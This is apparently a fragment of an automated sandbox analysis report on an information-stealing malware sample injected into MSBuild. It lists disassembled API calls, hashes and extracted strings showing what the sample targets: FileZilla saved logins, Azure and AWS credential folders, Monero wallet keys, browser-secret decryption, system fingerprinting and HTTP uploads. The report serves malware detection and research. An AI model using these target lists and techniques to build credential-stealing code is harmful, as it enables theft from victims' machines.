                                                                    control_flow_graph 1495 417500-41754a 1497 417553-4175c7 GetVolumeInformationA call 418d00 * 3 1495->1497 1498 41754c 1495->1498 1505 4175d8-4175df 1497->1505 1498->1497 1506 4175e1-4175fa call 418d00 1505->1506 1507 4175fc-417617 1505->1507 1506->1505 1513 417619-417626 call 41a740 1507->1513 1514 417628-417658 call 41a740 1507->1514 1518 41767e-41768e 1513->1518 1514->1518
                                                                    APIs
                                                                    • GetVolumeInformationA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041757F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1493810804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: InformationVolume
                                                                    • String ID: :$C$\
                                                                    • API String ID: 2039140958-3809124531
                                                                    • Opcode ID: ed3ca360dd794ca93df171aa1d69aa55e8069c6d35c7c4129d84d5da30dc5272
                                                                    • Instruction ID: 2fa5a76c25c4840d12821100fc964cf287d391274576238511e757cc0c078ff1
                                                                    • Opcode Fuzzy Hash: ed3ca360dd794ca93df171aa1d69aa55e8069c6d35c7c4129d84d5da30dc5272
                                                                    • Instruction Fuzzy Hash: BF41A2B5D44248ABDB10DF94DC45BEEBBB9EF08714F10019DF50967280D778AA84CBA9

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1521 401220-401247 call 4189b0 GlobalMemoryStatusEx 1524 401273-40127a 1521->1524 1525 401249-401271 call 41da00 * 2 1521->1525 1527 401281-401285 1524->1527 1525->1527 1528 401287 1527->1528 1529 40129a-40129d 1527->1529 1531 401292 1528->1531 1532 401289-401290 1528->1532 1531->1529 1532->1529 1532->1531
                                                                    APIs
                                                                    • GlobalMemoryStatusEx.KERNELBASE(00000040,?,00000000,00000040), ref: 0040123E
                                                                    • __aulldiv.LIBCMT ref: 00401258
                                                                    • __aulldiv.LIBCMT ref: 00401266
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1493810804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: __aulldiv$GlobalMemoryStatus
                                                                    • String ID: @
                                                                    • API String ID: 2185283323-2766056989
                                                                    • Opcode ID: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                                                    • Instruction ID: f2ded3d157cb35307e0b39d430c96622be3dd75f8d5744ac0086d878f352425a
                                                                    • Opcode Fuzzy Hash: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                                                    • Instruction Fuzzy Hash: 5901FBB0D84308BAEB10DBE4DC49B9EBB78AB15705F20809EE705B62D0D6785585879D

                                                                    Control-flow Graph

                                                                    APIs
                                                                      • Part of subcall function 00401160: GetSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,00416A17,00420AEF), ref: 0040116A
                                                                      • Part of subcall function 00401110: VirtualAllocExNuma.KERNELBASE(00000000,?,?,00416A1C), ref: 00401132
                                                                      • Part of subcall function 00401220: GlobalMemoryStatusEx.KERNELBASE(00000040,?,00000000,00000040), ref: 0040123E
                                                                      • Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401258
                                                                      • Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401266
                                                                    • GetUserDefaultLCID.KERNELBASE ref: 00416A26
                                                                      • Part of subcall function 00417850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F
                                                                      • Part of subcall function 004178E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1493810804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: NameUser__aulldiv$AllocComputerDefaultGlobalInfoMemoryNumaStatusSystemVirtual
                                                                    • String ID:
                                                                    • API String ID: 3178950686-0
                                                                    • Opcode ID: 89bd8792c9ea463fe5cd0678b04f38b1ba409c67d9b77676339e57910a337a73
                                                                    • Instruction ID: 00249ead6714b3af85de48d5768f0cff66b99727dd84f15ff7ce73ce32af2852
                                                                    • Opcode Fuzzy Hash: 89bd8792c9ea463fe5cd0678b04f38b1ba409c67d9b77676339e57910a337a73
                                                                    • Instruction Fuzzy Hash: 63316175940208AADB04FBF2DC56BEE7339AF04354F10452EF102A61D2DF7C6996C6AE
                                                                    APIs
                                                                    • GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1493810804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ComputerName
                                                                    • String ID:
                                                                    • API String ID: 3545744682-0
                                                                    • Opcode ID: 655548885853275668edecfa1cfdfba2d4285fba1d09bdc7eb36c2d1d55ec877
                                                                    • Instruction ID: 452d18c19ae851532a1d010ea63a4611fd0250a2e86211d30d2d96ca9096ca29
                                                                    • Opcode Fuzzy Hash: 655548885853275668edecfa1cfdfba2d4285fba1d09bdc7eb36c2d1d55ec877
                                                                    • Instruction Fuzzy Hash: 220186F1A48204EFD700DF94DD45BAABBB8FB05B11F10425AF545E3280C37859448BA6
                                                                    APIs
                                                                    • VirtualAllocExNuma.KERNELBASE(00000000,?,?,00416A1C), ref: 00401132
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1493810804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocNumaVirtual
                                                                    • String ID:
                                                                    • API String ID: 4233825816-0
                                                                    • Opcode ID: 3cbd8cc13bf7dc70ab035dff78f9dd202cda3002ce084c09b8f89ce2de56700b
                                                                    • Instruction ID: 516f97497d3ee46bc55051264f2a31c9d8efacdbd59bd60d04d859dfb32d17c4
                                                                    • Opcode Fuzzy Hash: 3cbd8cc13bf7dc70ab035dff78f9dd202cda3002ce084c09b8f89ce2de56700b
                                                                    • Instruction Fuzzy Hash: 76E08674985308FFE7106BE09C0AB0976B9EB05B05F101055F7087A1D0C6B826009699
                                                                    APIs
                                                                    • VirtualAlloc.KERNELBASE(00000000,17C841C0,00003000,00000004,?,?,?,0040114E,?,?,00416A1C), ref: 004010B3
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1493810804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocVirtual
                                                                    • String ID:
                                                                    • API String ID: 4275171209-0
                                                                    • Opcode ID: 8ce35272a596f1cdf5aa55b7e6bb44489e409ba54c945097ad2cb9ba566d6231
                                                                    • Instruction ID: e05e9ea69c75ff17789b13d2c0695db9e8f3777892ad192db41722de5b6306ee
                                                                    • Opcode Fuzzy Hash: 8ce35272a596f1cdf5aa55b7e6bb44489e409ba54c945097ad2cb9ba566d6231
                                                                    • Instruction Fuzzy Hash: F2F052B1681208BBE7109BA4AC49FABB3E8E305B14F301408F500E3380C5319E00CAA4
                                                                    APIs
                                                                    • IsDebuggerPresent.KERNEL32 ref: 0041BBA2
                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041BBB7
                                                                    • UnhandledExceptionFilter.KERNEL32(0041F2A8), ref: 0041BBC2
                                                                    • GetCurrentProcess.KERNEL32(C0000409), ref: 0041BBDE
                                                                    • TerminateProcess.KERNEL32(00000000), ref: 0041BBE5
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1493810804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                    • String ID:
                                                                    • API String ID: 2579439406-0
                                                                    • Opcode ID: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                                                    • Instruction ID: 2759986af63cf1bc905e0f8428f5e2b998159022a12c47e0d709fe691c65c3be
                                                                    • Opcode Fuzzy Hash: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                                                    • Instruction Fuzzy Hash: E921A3BC9002059FDB10DF69FD89A963BE4FB0A314F50403AE90A87264DBB45981EF4D
                                                                    APIs
                                                                    • strtok_s.MSVCRT ref: 0041031B
                                                                    • memset.MSVCRT ref: 004106DD
                                                                      • Part of subcall function 004188E0: malloc.MSVCRT ref: 004188E8
                                                                      • Part of subcall function 004188E0: strncpy.MSVCRT ref: 00418903
                                                                    • strtok_s.MSVCRT ref: 00410679
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1493810804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: strtok_s$mallocmemsetstrncpy
                                                                    • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$NA$NA$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                                                    • API String ID: 2676359353-514892060
                                                                    • Opcode ID: 5617bd6bc83757f25327082bfbfb60fa8d0a6348b7b524702c500f70768eef60
                                                                    • Instruction ID: d15eb70b6d553ab1cc94bc99ca27928082ec116ada4a7d19c18b432e65637ade
                                                                    • Opcode Fuzzy Hash: 5617bd6bc83757f25327082bfbfb60fa8d0a6348b7b524702c500f70768eef60
                                                                    • Instruction Fuzzy Hash: 86D16D75A41208ABCB04FBF1DD86EEE7379FF14314F50441EF102A6091DE78AA96CB69
                                                                    APIs
                                                                    • memset.MSVCRT ref: 00410C1C
                                                                    • lstrcatA.KERNEL32(?,00000000), ref: 00410C35
                                                                    • lstrcatA.KERNEL32(?,00420D7C), ref: 00410C47
                                                                    • lstrcatA.KERNEL32(?,00000000), ref: 00410C5D
                                                                    • lstrcatA.KERNEL32(?,00420D80), ref: 00410C6F
                                                                    • lstrcatA.KERNEL32(?,00000000), ref: 00410C88
                                                                    • lstrcatA.KERNEL32(?,00420D84), ref: 00410C9A
                                                                    • lstrlenA.KERNEL32(?), ref: 00410CA7
                                                                    • memset.MSVCRT ref: 00410CCD
                                                                    • memset.MSVCRT ref: 00410CE1
                                                                    • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 00410D5A
                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00410D66
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1493810804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrcat$memset$CreateObjectProcessSingleWaitlstrlen
                                                                    • String ID: .exe
                                                                    • API String ID: 2214552867-4119554291
                                                                    • Opcode ID: 6364e5e739fe9739766a1ce8d8c7e5a183e8e2bdcb2e6e6671a0d6d634042010
                                                                    • Instruction ID: 8c4414bd7b792449c86a3c64e171a12ac7102eaeec46e1acf96b3d3d4dd6cf75
                                                                    • Opcode Fuzzy Hash: 6364e5e739fe9739766a1ce8d8c7e5a183e8e2bdcb2e6e6671a0d6d634042010
                                                                    • Instruction Fuzzy Hash: A78194B55111186BCB14FBA1CD52FEE7338AF44308F40419EB30A66082DE786AD9CF6E
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1493810804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: memset
                                                                    • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache$zaA
                                                                    • API String ID: 2221118986-156832076
                                                                    • Opcode ID: 63500b277e5d8c6ba40ed9413d1edfa83572fad66260e383529a6b6b95d2c298
                                                                    • Instruction ID: 18812f4626155d1e2a42465cb68794f5c6847905bec5d07e7ac1139e0e5490f3
                                                                    • Opcode Fuzzy Hash: 63500b277e5d8c6ba40ed9413d1edfa83572fad66260e383529a6b6b95d2c298
                                                                    • Instruction Fuzzy Hash: 3141D6B9A4031467C710F7B0EC47FDD3738AB64704F404459B645660C2EEB897D98B9A
                                                                    APIs
                                                                    • ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 004170DE
                                                                    • OpenProcess.KERNEL32(001FFFFF,00000000,0041730D,004205BD), ref: 0041711C
                                                                    • memset.MSVCRT ref: 0041716A
                                                                    • ??_V@YAXPAX@Z.MSVCRT(?), ref: 004172BE
                                                                    Strings
                                                                    • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0041718C
                                                                    • sA, xrefs: 004172AE, 00417179, 0041717C
                                                                    • sA, xrefs: 00417111
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1493810804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: OpenProcessmemset
                                                                    • String ID: sA$sA$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                                                    • API String ID: 1606381396-2614523144
                                                                    • Opcode ID: a73ac6e1bb2c91b578430d02177e5a2f8beb51943881740cc90b8311f986bdaf
                                                                    • Instruction ID: ffe5c4151d56689e238fca5affca6521033e0b5082b25a646ea50ffb364ad3ac
                                                                    • Opcode Fuzzy Hash: a73ac6e1bb2c91b578430d02177e5a2f8beb51943881740cc90b8311f986bdaf
                                                                    • Instruction Fuzzy Hash: 71515FB0D04218ABDB14EB91DD85BEEB774AF04304F1040AEE61576281EB786AC9CF5D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1493810804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: !=A$%s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                                                    • API String ID: 0-817767981
                                                                    • Opcode ID: c3ad0e5f37a6afd264e19c98f003c489031be70fef7a74d9d5741692706db697
                                                                    • Instruction ID: 6b32dcbabd2ae606338a05af88a65253e6d0136fcb4401239c8972690a9ca057
                                                                    • Opcode Fuzzy Hash: c3ad0e5f37a6afd264e19c98f003c489031be70fef7a74d9d5741692706db697
                                                                    • Instruction Fuzzy Hash: 45A182B5A40218ABDB20DFA4DC85FEA7379BF45301F04458DB50D96181EB789B84CF66
                                                                    APIs
                                                                      • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                                                      • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                                                      • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                                                      • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                                                    • memcpy.MSVCRT(?,00000000,00000000), ref: 00405EC6
                                                                    • memcpy.MSVCRT(?), ref: 00405EFE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1493810804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ??2@$memcpy$CrackInternet
                                                                    • String ID: "$"$------$------$------
                                                                    • API String ID: 4271525049-2180234286
                                                                    • Opcode ID: 4205a6c64491eede6f2c0190817c01b6d1188d899bee5cc8d5380a99dbe7c93c
                                                                    • Instruction ID: 7b5b204680124ce1d4beb717fdfef1c68a0c63715f2d18b0248442adb904f056
                                                                    • Opcode Fuzzy Hash: 4205a6c64491eede6f2c0190817c01b6d1188d899bee5cc8d5380a99dbe7c93c
                                                                    • Instruction Fuzzy Hash: 20124071821118ABCB15FBA1DC95FEEB378BF14314F50419EB10A62091DF782B9ACF69
                                                                    APIs
                                                                    • memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                                                      • Part of subcall function 00410A60: memset.MSVCRT ref: 00410C1C
                                                                      • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00000000), ref: 00410C35
                                                                      • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00420D7C), ref: 00410C47
                                                                      • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00000000), ref: 00410C5D
                                                                      • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00420D80), ref: 00410C6F
                                                                    • memcmp.MSVCRT(?,v10,00000003), ref: 00409EAF
                                                                    • memset.MSVCRT ref: 00409EE8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1493810804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrcat$memcmpmemset
                                                                    • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                                                                    • API String ID: 1976689032-1096346117
                                                                    • Opcode ID: cf3bd8b6a91d7380b4fcfdc4a2eaf8d3038d72e2fe7c69aa23c32b41aba9b41f
                                                                    • Instruction ID: cfc602575c7eb8b90e75612a825b183f0a0020e5ceb1952e76b28d7f8d83ce04
                                                                    • Opcode Fuzzy Hash: cf3bd8b6a91d7380b4fcfdc4a2eaf8d3038d72e2fe7c69aa23c32b41aba9b41f
                                                                    • Instruction Fuzzy Hash: C9615F30A00248EBCB24EFA5DD96FED7775AF44304F408029F90A6F1D1DB786A56CB5A
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1493810804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: memset
                                                                    • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                                                    • API String ID: 2221118986-218353709
                                                                    • Opcode ID: a32f2aae1de9b97ae466325f1f020e6fdbbafcfcec33de046a9004802322f3a2
                                                                    • Instruction ID: 674d48b949cffd92695f0a4f51b6d393b2dd06dcaa63b8f6d50fb5eb71b8da29
                                                                    • Opcode Fuzzy Hash: a32f2aae1de9b97ae466325f1f020e6fdbbafcfcec33de046a9004802322f3a2
                                                                    • Instruction Fuzzy Hash: AA5164B195011897CB15FB61DD91BED733CAF54304F4041ADB60A62091EE385BDACBAA
                                                                    APIs
                                                                      • Part of subcall function 00406280: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000,00420DFB), ref: 004062E1
                                                                      • Part of subcall function 00406280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
                                                                      • Part of subcall function 00406280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
                                                                    • strtok.MSVCRT(00000000,?), ref: 0041539E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1493810804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Internet$ConnectHttpOpenRequestSendstrtok
                                                                    • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                                                    • API String ID: 632984754-1526165396
                                                                    • Opcode ID: 4a2ea036609cd15b672270c35ab07a18dfd7f62b3a06473966441f12aab465d2
                                                                    • Instruction ID: 2e955e57ea7f1c083e6e45f715f374ff83ee784ca3e0e9be4ff8c8b21657e330
                                                                    • Opcode Fuzzy Hash: 4a2ea036609cd15b672270c35ab07a18dfd7f62b3a06473966441f12aab465d2
                                                                    • Instruction Fuzzy Hash: 1A514130911108EBCB14FF61CD92AED7779AF50358F50402EF80A6B591DF386B96CB6A
                                                                    APIs
                                                                    • __lock.LIBCMT ref: 0041B39A
                                                                      • Part of subcall function 0041AFAC: __mtinitlocknum.LIBCMT ref: 0041AFC2
                                                                      • Part of subcall function 0041AFAC: __amsg_exit.LIBCMT ref: 0041AFCE
                                                                      • Part of subcall function 0041AFAC: EnterCriticalSection.KERNEL32(?,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041AFD6
                                                                    • DecodePointer.KERNEL32(0042A138,00000020,0041B4DD,?,00000001,00000000,?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E), ref: 0041B3D6
                                                                    • DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041B3E7
                                                                      • Part of subcall function 0041BE35: EncodePointer.KERNEL32(00000000,0041C063,004495B8,00000314,00000000,?,?,?,?,?,0041B707,004495B8,Microsoft Visual C++ Runtime Library,00012010), ref: 0041BE37
                                                                    • DecodePointer.KERNEL32(-00000004,?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041B40D
                                                                    • DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041B420
                                                                    • DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041B42A
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1493810804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Pointer$Decode$CriticalEncodeEnterSection__amsg_exit__lock__mtinitlocknum
                                                                    • String ID:
                                                                    • API String ID: 2005412495-0
                                                                    • Opcode ID: 430bce5bb079d1d45eb37588782b3a2619b50b5e0611126e08e4fa3877c2895d
                                                                    • Instruction ID: fa90de3286715eaa6817e9c79d9293911763414a7997c4368e9d4f64dee3ff46
                                                                    • Opcode Fuzzy Hash: 430bce5bb079d1d45eb37588782b3a2619b50b5e0611126e08e4fa3877c2895d
                                                                    • Instruction Fuzzy Hash: A5314874900309DFDF109FA9C9452DEBAF1FF48314F10802BE454A6262CBB94891DFAE
                                                                    APIs
                                                                    • __getptd.LIBCMT ref: 0041C9EA
                                                                      • Part of subcall function 0041BF9F: __getptd_noexit.LIBCMT ref: 0041BFA2
                                                                      • Part of subcall function 0041BF9F: __amsg_exit.LIBCMT ref: 0041BFAF
                                                                    • __amsg_exit.LIBCMT ref: 0041CA0A
                                                                    • __lock.LIBCMT ref: 0041CA1A
                                                                    • InterlockedDecrement.KERNEL32(?), ref: 0041CA37
                                                                    • free.MSVCRT ref: 0041CA4A
                                                                    • InterlockedIncrement.KERNEL32(0042B558), ref: 0041CA62
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1493810804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
                                                                    • String ID:
                                                                    • API String ID: 634100517-0
                                                                    • Opcode ID: 89c3f3603ea426d8c1dcae7c91f98695ae5431033bc18fad3d55e9ead8607d02
                                                                    • Instruction ID: 84b4572ca590114782b091576b9a89d8360325c6110713fe167f1eb626e4287d
                                                                    • Opcode Fuzzy Hash: 89c3f3603ea426d8c1dcae7c91f98695ae5431033bc18fad3d55e9ead8607d02
                                                                    • Instruction Fuzzy Hash: 5801C431A817299BC722EB669C857DE77A0BF04794F01811BE81467390C72C69D2CBDD
                                                                    APIs
                                                                    • strlen.MSVCRT ref: 00416F1F
                                                                    • ??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,0041719A,00000000,65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30,00000000,00000000), ref: 00416F4D
                                                                      • Part of subcall function 00416BD0: strlen.MSVCRT ref: 00416BE1
                                                                      • Part of subcall function 00416BD0: strlen.MSVCRT ref: 00416C05
                                                                    • VirtualQueryEx.KERNEL32(?,00000000,?,0000001C), ref: 00416F92
                                                                    • ??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041719A), ref: 004170B3
                                                                      • Part of subcall function 00416DE0: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 00416DF8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1493810804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: strlen$MemoryProcessQueryReadVirtual
                                                                    • String ID: @
                                                                    • API String ID: 2950663791-2766056989
                                                                    • Opcode ID: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                                                    • Instruction ID: da6ee04ed372484ea639f8c5ae6d2cf8ded6d6947598eb42fecba3fc0a9bdd2e
                                                                    • Opcode Fuzzy Hash: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                                                    • Instruction Fuzzy Hash: 27511CB5E041099BDB04CF98D981AEFBBB5FF88304F108559F919A7340D738EA51CBA5
                                                                    APIs
                                                                    • __getptd.LIBCMT ref: 0041C74E
                                                                      • Part of subcall function 0041BF9F: __getptd_noexit.LIBCMT ref: 0041BFA2
                                                                      • Part of subcall function 0041BF9F: __amsg_exit.LIBCMT ref: 0041BFAF
                                                                    • __getptd.LIBCMT ref: 0041C765
                                                                    • __amsg_exit.LIBCMT ref: 0041C773
                                                                    • __lock.LIBCMT ref: 0041C783
                                                                    • __updatetlocinfoEx_nolock.LIBCMT ref: 0041C797
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1493810804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                    • String ID:
                                                                    • API String ID: 938513278-0
                                                                    • Opcode ID: 97b8e5648014eb75fe7e4c2f5c52bbac28816c25018f37e92348e0e4551f1163
                                                                    • Instruction ID: 4c6ecd523783b942696bdc62fd612c852c6eee159b5b032e672b771ca3e86784
                                                                    • Opcode Fuzzy Hash: 97b8e5648014eb75fe7e4c2f5c52bbac28816c25018f37e92348e0e4551f1163
                                                                    • Instruction Fuzzy Hash: B0F09632A813119BD7207BB95C467DE33A09F00728F24414FF414A62D2CBAC59D28E9E
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1493810804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
